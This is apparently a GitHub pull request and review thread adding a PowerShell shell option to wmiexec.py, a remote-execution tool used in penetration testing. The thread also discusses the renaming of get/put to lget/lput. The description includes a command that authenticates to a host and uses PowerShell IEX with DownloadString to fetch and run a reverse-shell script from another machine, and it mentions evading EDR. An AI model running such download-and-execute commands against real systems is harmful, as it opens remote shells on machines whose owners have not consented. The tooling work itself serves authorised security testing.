### PR TITLE
Add PowerShell option for semi-interactive shell in wmiexec.py

### PR DESCRIPTION
**Pull request by snovvcrash**
Hello there!

In this pull request I'd like to implement the `-shell-type` switch for wmiexec.py, which lets you use PowerShell as a command processor for the semi-interactive shell mode.

To get a PowerShell shell I used to serve a reverse-shell script on my box and trigger the callback with wmiexec.py like follows:

```
$ wmiexec.py snovvcrash:'Passw0rd123!'@10.10.13.38 "powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')"
```

During the recent engagement I found myself in a situation when the victim host was located in a separate VLAN, and it was a mess to create more tunnels, so I had to run `powershell -enc <BASE64_CMD>` for every pwsh command I wanted to execute. Also using an external PowerShell launcher will likely be detected by EDR. So, I though that it would be nice to have this feature automated, because local enumeration is much handier with PowerShell then with cmd.exe (from my point of view).

P. S. I had to rename `get` and `put` actions to `lget` and `lput` to execute PowerShell cmdlets which start with `get-...`, e. g. `get-filehash`.

### CODE REVIEW

**Comment by 0xdeaddood** [comment]
It's cool! It would be great to extend it to the rest of the _*exec_ examples😄.
Thanks for the PR @snovvcrash , merging!

**Comment by snovvcrash** [comment]
> 
> 
> It's cool! It would be great to extend it to the rest of the _*exec_ examples😄.
> Thanks for the PR @snovvcrash , merging!

Will do my best :smile:

**Comment by mubix** [comment]
@0xdeaddood @snovvcrash @asolino - Just a note, if you are going to change something so fundamental as the command to upload and download files, I would highly recommend this be communicated a head of time AND please update the help for the command when you do so. This broke a bunch of my tooling.
```
C:\temp>get a.exe
'get' is not recognized as an internal or external command,
operable program or batch file.

C:\temp>help

 lcd {path}                 - changes the current local directory to {path}
 exit                       - terminates the server process (and this session)
 put {src_file, dst_path}   - uploads a local file to the dst_path (dst_path = default current directory)
 get {file}                 - downloads pathname to the current local dir
 ! {cmd}                    - executes a local shell cmd

C:\temp>lget a.exe
[*] Downloading C:\\temp\a.exe
```

**Comment by mubix** [comment]
I see that updating the help is in #1037 just a little frustrating is all

**Comment by snovvcrash** [comment]
> 
> 
> @0xdeaddood @snovvcrash @asolino - Just a note, if you are going to change something so fundamental as the command to upload and download files, I would highly recommend this be communicated a head of time AND please update the help for the command when you do so. This broke a bunch of my tooling.
> 
> ```
> C:\temp>get a.exe
> 'get' is not recognized as an internal or external command,
> operable program or batch file.
> 
> C:\temp>help
> 
>  lcd {path}                 - changes the current local directory to {path}
>  exit                       - terminates the server process (and this session)
>  put {src_file, dst_path}   - uploads a local file to the dst_path (dst_path = default current directory)
>  get {file}                 - downloads pathname to the current local dir
>  ! {cmd}                    - executes a local shell cmd
> 
> C:\temp>lget a.exe
> [*] Downloading C:\\temp\a.exe
> ```

My apologies for that. The help is updated in #1037, that's correct.

**Pull request merged**
